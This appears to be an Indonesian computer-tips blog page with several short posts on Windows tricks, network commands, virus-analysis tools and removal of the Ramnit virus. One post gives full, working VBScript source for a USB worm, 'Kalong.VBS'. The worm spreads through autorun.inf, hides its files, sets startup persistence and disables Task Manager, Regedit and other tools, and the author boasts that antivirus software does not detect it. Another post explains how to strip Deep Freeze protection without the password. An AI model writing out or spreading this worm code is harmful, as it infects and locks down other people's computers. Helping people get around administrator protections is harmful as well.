Berbagai Cara Melumpuhkan Deepfreeze

Deep Freeze memang aplikasi “aneh bin ajaib”. Aplikasi ini bisa “membekukan” harddisk sehingga perubahan-perubahan yang terjadi pada system akan lenyap saat komputer di restart. Namun, saat kita mencoba mengUninstallnya, seringkali kita mengalami kesulitan. Belum lagi kalau kita lupa passwordnya.
Di bawah ini akan saya coba ulas berbagai tips untuk menghabisi Deep Freeze yang saya kumpulkan dari beberapa sumber. Semoga bisa membantu anda.
============Pake xDeepFreeze=============
1. Download xDeepFreeze di sini.
2. ekstrak ke C:\xDeepFreeze
3. Jalankan file Run_Me.exe. Muncul file “mcr.bat” dan “XDeepFreeze.exe” akan terload.
4. Pada XDeepFreeze, Tekan “Stop DeepFreeze”, untuk menghentikan “frzstate.exe”
5. Bersihkan registry yang dibuat Deep Freeze saat instalasi, tekan “Clean Registry”.
6. Jalankan command.com di folder C:\xDeepFreeze
7. Jalankan mcr.bat. Ini akan membersihkan file “persifrz.vxd”.
8. Klik Exit. Deep Freeze tinggal sejarah.
============Pake Deep Unfreezer (Deep Freeze dibawah v.6)=============
1. Download Deep Unfreezer di sini.
2. Jalankan aplikasi. Klik Load Status.
3. Pilih Boot Thawed. Klik Save Status.
4. Reboot

Read more »

Tools Untuk Menganalisa Suatu Virus

Virus-virus yang tersebar di internet semakin hari bertambah banyak sehingga banyak perusahaan-perusahaan penyedia antivirus seperti kaspersky, McAffe, Norton dan sebagainya berlomba-lomba membuat antivirus yang sangat ampuh.
Pembuatan suatu antivirus sendiri tentunya tidak bisa lepas dari pengenalan virus itu sendiri. Kita harus menganalisa cara kerjanya, apa saja yang mampu di perbuat oleh virus itu, apa saja yang diinfeksi dan sebagainya.
Untuk melakukan analisa suatu virus biasanya membutuhkan tool-tool yang dapat menganaliasa suatu virus secara mendetail dan cepat.
Berikut terdapat beberapa tools yang dapat anda gunakan untuk menganalisa suatu virus.
1. Malcode Analysis Pack
(http://labs.idefense.com/software/download/?downloadID=8)
Tool ini terdiri dari bermacam-macam aplikasi yang dapat membantu anda menganalisa suatu malcode.
Contohnya seperti ShellExt, socketTool, fakeDNS, Sheilcode2Exe dan sebagainya.
2. Autorun For Windows
(http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx)
Aplikasi ini digunakan untuk mengetahui lokasi auto-starting dari startup monitor yang berada di windows.
Aplikasi ini akan menunjukkan program yang berjalan saat sistem melakukan bootup atau login.
3. RegMon for Windows
(http://technet.microsoft.com/en-us/sysinternals/bb896652.aspx)
Tool ini bisa menampilkan aplikasi mana saja yang sedang melakukan akses registry pada sistem anda.
Semua akan ditampilkan secara real-time
4. FileMon for Windows
(http://technet.microsoft.com/en-us/sysinternals/bb896642.aspx)
Tool ini akan menampilkan system activity dari sebuah file dalam operating system secara real-time.

5. Multipot (http://labs.idefense.com/software/download/?downloadID=9)
Aplikasi ini di desain untuk mengumpulkan malicious code yang banyak terdapat di internet.
6. Process Explorer for Windows
(http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx)
Tool ini mengetahui informasi mengenai handles dal DLLs proses yang sedang terbuka.
Aplikasi ini akan menunjukkan list dari proses yang sedang aktif saat itu.
7. Resource Hacker (http://www.angusj.com/resourcehacker/)
Tool yang bisa digunakan untuk mengubah resource pada win32 executables serta resource file yang lain.
8. Rootkit Unhooker (http://www.antirootkit.com/software/RootKit-Unhooker.htm)
Aplikasi untuk mendateksi rootkit.
Beberapa fitur yang ditawarkan antara lain Ultimate Drivers Detection, Hidden File Detection dan sebagainya.
9. SysAnalyzer (http://labs.idefense.com/software/download/?downloadID=15)
Tool ini mampu menganalisa malcode run time secara otomatis untuk memonitor apa yang sedang dilakukan oleh sistem dan proses yang sedang berjalan.
10. PE iDentifier (http://www.peid.info/)
Aplikasi ini digunakan untuk mendeteksi packers,cryptors.
Tool ini mampu mendeteks lebih dari 600 signatures yang berbeda dari PE file.
11. VB Decompiler Lite (http://www.vb-decompiler.org/download.htm)
Sebuah program decompiler untuk program yang berextensi EXE, DLL dan OCX.
12. MiTec EXE Explorer (http://www.mitec.cz/exe.html)
Tool ini diciptakan sebagai executable reader.
Aplikasi ini mampu membaca dan menampilkan executable file properties dan struktur dari sebuah file yang dianalisis.

Read more »

Shortcut untuk Log Off

Untuk mempercepat log off Anda bisa membuat shortcut pada desktop. Caranya :
1. Klik kanan area kosong pada desktop lalu pilih New – Shortcut.
2. Pada command line ketikkan C:\WINDOWS\RUNDLL.EXE shell32.dll,SHExitWindowsEx 0
3. Klik next dan beri nama shortcut tersebut.
4. Terakhir klik Finish

Read more »

Membuat Virus Sederhana – Notepad

Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.
Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :

‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set kalong = createobject(”WScript.Shell”)

‘//–Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run,  dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip - Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”

‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

Read more »

Perintah Command Prompt Untuk Jaringan Komputer

Berikut adalah perintah-perintah pada Command Prompt yang berhubungan dengan jaringan komputer.
Untuk melakukan perintah-perintah tersebut Anda harus masuk ke Command Prompt ( Klik Start ->Run ->Ketik CMD )
1. ipconfig /all
Menampilkan informasi konfigurasi koneksi, misalnya Host Name, Primary DNS Type, Ethernet Adapter LAN.
2. ipconfig /flushdns
Menghapus DNS Cache
3. ipconfig /release
“Menghapus” semua koneksi IP Address.
4. ipconfig /renew
Membuat IP Address baru untuk adapter tertentu.
5. ipconfig /displaydns
Menampilkan DNS Cache.
6. ipconfig /registerdns
Melakukan refresh DNS dan meregister kembali koneksi DNS.
7. ipconfig /showclassid
Menampilkan informasi DHCP Class.

8. ipconfig /setclassid
Mengubah DHCP Class ID
9. control netconnections
Menampilkan Network Connection.
10. nslookup
Mengetahui alamat ip address dari nama domain yang di tuliskan
11. netstat
Menampilkan informasi koneksi TCP/IP yang sedang aktif.
12. route
Menampilkan local route.
13. hostname
Menampilkan nama komputer.
14. ping
Contoh: ping www.vaza11.blogspot.com
Melakukan test koneksi ke situs www.vaza11.blogspot.com.
Semakin sedikit % loss-nya maka semakin baik koneksinya.
15. tracert
Menampilkan informasi IP Address route.

Read more »

Cara Mengubah Icon Harddisk dan Flashdisk

Disini saya akan memberikan cara bagaimana mengubah icon harddisk dan flashdisk anda tanpa menggunakan bantuan software tambahan
Caranya adalah sebagai berikut :
1. – Cari gambar icon yang ingin anda gunakan dan taruh di root drive c:\ ( Jika anda ingin merubah icon di drive c: )
- Cari gambar icon yang ingin anda gunakan dan taruh di root flashdisk kamu (Jika anda ingin merubah icon di flashdisk)
2. Setelah itu buka notepad dan ketikkan kode di bawah ini
[autorun]
OPEN=
ICON=namaicon.ico
3. Ganti nama “namaicon.ico” dengan nama icon yang sudah kamu siapkan.
4. Lalu simpan dengan nama Autorun.inf ( di Save as type pilih All Files )
- Root drive c:\ ( Jika anda ingin merubah icon di drive c: )
- Root flashdisk kamu (Jika anda ingin merubah icon di flashdisk)
5 Setelah itu restart komputer anda dan lihat hasilnya, kalau untuk flashdisk cukup melakukan eject aja.

Read more »

Tombol Rahasia Di Facebook

Ini dia Rahasia Terbaru Facebook dengan menggunakan kombinasi Tombol Keyboard . Beberapa kombinasi Tombol berikut ini akan membawa anda menjelajah Facebook lebih cepat dan mengasyikkan, dan kemungkinan Artikel ini adalah yang pertama membahas cara ini. Kurang yakin Silahkan di Search dengan Google dengan kata kunci " Tombol Rahasia pada Facebook".
Silahkan Di Coba Kombinasi Tombol-tombol Berikut :
Caranya Anda Login dulu pada Account Facebook anda, setelah masuk silahkan Tekan Tombol2 berikut :
Shift+ Alt + 1 = Maka anda akan di bawa ke halaman Utama ( Home )

Shift+ Alt + 2 = Profile

Shift+ Alt + 3 = Permintaan Pertemanan

Shift+ Alt + 4 = Pesan

Shift+ Alt + 5 = Pemberitahuan

Shift+ Alt + 6 = Edit Account

Shift+ Alt + 7 = Settings Privasi

Shift+ Alt + 8 = Penggemar Facebook

Shift+ Alt + 9 = Statement of Rights and Responsibilities

Shift+ Alt + 10 = Pusat Bantuan

Read more »

Bermain Dengan Lampu Caps Lock, Num Lock dan Scroll Lock

Ternyata Lampu Caps Lock, Num Lock dan Scroll Lock bisa dibuat menjadi lampu kelap – kelip seperti lampu disko dengan menggunakan sedikit script VBS.
Caranya sebagai berikut :
1. Buka Notepad anda.
2. Copy dan Paste script dibawah ini kedalam notepad anda.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 500
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

3. Setelah itu save dengan nama finderonly.vbs
4. Buka file finderonly.vbs tersebut dan lihat Lampu Caps Lock, Num Lock dan Scroll Lock di keyboard anda. Maka akan terlihat kelap – kelip seperti lampu disko.

Untuk mematikannya caranya sebagai berikut :
1. Buka Task Manager atau tekan CTRL + ALT + DEL secara bersamaan.
2. Masuk TAB Processes
3. Cari Proses yang bernama wscript.exe dan klik tombol End Process maka lampu keyboard anda akan kembali seperti semula.
Selamat Mencoba

Read more »

Cara Mengatasi Virus Autorun

Virus dapat menyebar dengan berbagai cara, dan salah satu caranya ialah dengan menggunakan fasilitas Autorun yang digunakan untuk mengakses seperti removable disk atau CD/DVD. Biasanya sang virus maker membuat script yang berisi virus di Autorun.inf , sehingga ketika anda misalnya mencolokan flash disk, kemudian autorun nya aktif, virus dapat memasuki komputer anda. Cara yang paling simple untuk mencegah virus yang jenisnya kayak ini adalah dengan mematikan autorun pada drive/flash disk. Tentunya metode ini tanpa menggunakan Antivirus. Okay, berikut cara mematikan fungsi autorun via registry :
1. Buka Registry Editor dengan cara Start > Run, ketik regedit, tekan enter.
2. Kemudian carilah registry ini :
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
3. Cari NoDriveTypeAutoRun, dan klik kanan pilih modify.
4. Akan muncul window Edit DWORD Value, kemudian ganti value data-nya menjadi ff,
dengan begitu anda telah mematikan fungsi autorun. Klik OK.
5. Restart komputer.

Dengan begitu anda telah meminimalisir terinfeksi virus autorun. Selamat Mencoba !!!

Read more »

Memperkecil Ukuran Foto Dengan Cepat

Untuk urusan edit2 foto atau image emang banyak banget jenis softwarenya, tapi kalau keperluan kita cuma buat urusan mengecilkan ukuran foto atau image, tidak ada salahnya menggunakan program ‘Image Shrink”.

Program yang satu ini memang cukup sederhana, tapi cukup praktis dan cepat untuk urusan memperkecil atau mengecilkan ukuran foto (photo). Denga ukuran yang kecil cuma 125KB tanpa perlu diinstall, jadi bisa dijalankan langsung tuch dari flashdisk misalnya.

Untuk mengecilkan foto, tinggal open sumber file gambar, trus pilih persentase (dalam persen) pengecilan yang diinginkan. Hasil langsung terlihat di bagian sebelah kanan. Seperti contoh screenshot dibawah nich, saya input format image jpg dengan resolusi 1024x768px trus saya pilih shrink 40% dari scrollbox, dibagian kanan langsung terlihat hasil pengecilannya. Terakhir tinggal di simpan (save) file outputnya. Program sederhana tapi praktis buat yang butuh dengan cepat memperkecil file foto, image, gambar.


Image Shrink :
Download

Read more »

PCMAV Express for Ramnit

Ramnit merupakan salah satu virus yang belakangan ini terus merajalela. Ciri yang paling mudah dikenali pada komputer yang telah terinfeksi Ramnit adalah terciptanya 4 buah shortcut pada removable disk dengan nama:
Copy of Shortcut to (1).lnk
Copy of Shortcut to (2).lnk
Copy of Shortcut to (3).lnk
Copy of Shortcut to (4).lnk
Dibalik shortcut yang mudah terlihat, banyak aksi Ramnit lainnya yang tidak mudah terdeteksi, antara lain menginfeksi file *.exe/*.dll/*.htm/*.html, menginjeksi multi-processes di memory, dan berusaha men-download malware lainnya. Ramnit dilengkapi dengan kemampuan rootkit canggih yang membuatnya stealth di memory. Ramnit dapat menjangkiti komputer yang bersih dengan berbagai teknik, melalui exploit shortcut, autorun, ataupun melalui eksekusi file exe/dll dan HTML yang telah terinfeksi.
PCMAV Express for Ramnit dibuat untuk membersihkan berbagai varian Ramnit yang in-the-wild, menghentikan proses Ramnit di memory komputer yang terinfeksi, membersihkan file yang terinfeksi Ramnit, baik executable file maupun HTML dengan sempurna dan akurat pada setiap drive (hard disk maupun removable disk) yang terpasang, dan memperbaiki registry yang diubah Ramnit.
Aturan Penggunaan:

1. Jalankan PCMAV for Ramnit dari hard disk, hindari menjalankannya dari flash disk mengingat shortcut Ramnit dapat tereksekusi saat Anda mengklik drive flash disk yang terinfeksi melalui Windows Explorer.
2. Pastikan user Anda memiliki hak setara Administrator.
3. Nonaktifkan/tutup aplikasi (antivirus, Windows Explorer maupun program lainnya) yang masih aktif agar tidak mengganggu PCMAV Express.
4. Nonaktifkan fungsi Autorun (link referensi: http://support.microsoft.com/kb/967715).
5. Pasang flashdisk yang terinfeksi pada komputer agar ikut dibersihkan oleh PCMAV Express for Ramnit, tetapi jangan diakses.
6. Pastikan komputer Anda *tidak* terkoneksi ke jaringan atau Internet selama proses scan.
7. Untuk beberapa varian Ramnit, PCMAV Express for Ramnit akan memberikan pilihan untuk scan melalui Safe Mode.Jika Anda memilih pilihan ini maka PCMAV Express for Ramnit akan berusaha melakukan restart ke Safe Mode secara otomatis, dan mengembalikannya ke Normal Mode setelah proses scan selesai.
8. Setelah selesai, sangat disarankan untuk melakukan restart dan scan ulang (jika perlu).
9. Setelah virus berhasil dituntaskan, segera update/patch Windows Anda.
10. Pastikan seluruh PC yang telah terhubung di dalam jaringan juga telah bebas Ramnit, sebelum PC Anda kembali terkoneksi ke jaringan.

Update:
Bagian ini akan terus di-update sesuai dengan perkembangan virus Ramnit yang terus kami pantau. Varian baru Ramnit (atau virus lainnya) yang Anda temukan dapat di-upload ke: http://upload.virusindonesia.com.
Sampai saat ini PCMAV Express for Ramnit telah dapat menangani 13 varian Ramnit yang berfungsi sebagai dropper virus:
1.   Ramnit.A.dropper
2.   Ramnit.B.dropper
3.   Ramnit.C.dropper
4.   Ramnit.D.dropper
5.   Ramnit.E.dropper
6.   Ramnit.F.dropper
7.   Ramnit.G.dropper
8.   Ramnit.H.dropper
9.   Ramnit.I.dropper
10. Ramnit.J.dropper
11. Ramnit.K.dropper
12. Ramnit.L.dropper
13. Ramnit.M.dropper
Secara regular engine utama PCMAV akan di-update mengikuti perkembangan Ramnit.
Pada halaman ini kami juga menyediakan PCMAV Express for Ramnit untuk di-download pada link dibawah ini (link dapat berubah jika ada update baru).
Download :
PCMAV Express for Ramnit

Read more »